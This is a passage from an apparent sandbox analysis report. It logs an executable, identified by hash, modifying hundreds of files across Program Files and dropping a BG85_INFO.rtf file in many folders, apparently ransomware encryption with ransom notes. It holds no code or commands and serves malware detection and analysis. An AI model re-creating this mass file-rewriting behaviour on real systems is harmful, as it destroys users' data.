Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\CompareRedo.wmf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fa.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\te.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\UnprotectLock.vst c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\84.0.4147.89_chrome_installer.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\84.0.4147.89.manifest c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ResizeReset.wma c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722114609.pma c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 